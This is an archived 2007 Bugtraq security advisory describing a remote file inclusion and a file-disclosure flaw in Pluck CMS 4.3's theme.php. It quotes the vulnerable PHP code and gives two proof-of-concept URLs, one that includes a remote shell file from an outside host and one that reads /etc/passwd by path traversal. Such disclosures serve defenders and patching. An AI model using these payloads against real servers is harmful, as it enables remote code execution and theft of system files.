| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070802114048.13903.qmail@securityfocus.com>
Date: 2 Aug 2007 11:40:48 -0000
From: no-reply@...a-security.net
To: bugtraq@...urityfocus.com
Subject: Pluck 4.3 themes.php Remote File Inclusion and disclosure
__________________
Aria-Security Team
__________________
Pluck 4.3 Remote File Inclusion
Vendor: http://www.pluck-cms.org/
/path/data/inc/theme.php
if Register_global was set as ON then we can use the $dir variable for RFI
(is_file($dir."/".$file))
$files[]=$file;
else
$dirs[]=$dir."/".$file;
}
}
if($dirs) {
foreach ($dirs as $dir) {
include ("$dir/theme.php");
http://example.com/path/data/inc/theme.php?dir=http://site/shell.ext?
-----------------------------------------------------
fputs($file, "<?php \$themepref = \"$cont\"; ?>");
if Register_global was set as ON then we can use the $file variable for disclosure.
example:
http://example.com/path/data/inc/theme.php?file=../../../../etc/passwd (DEPENDS on server)
Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info [PERSONAL BLOG]
Powered by blists - more mailing lists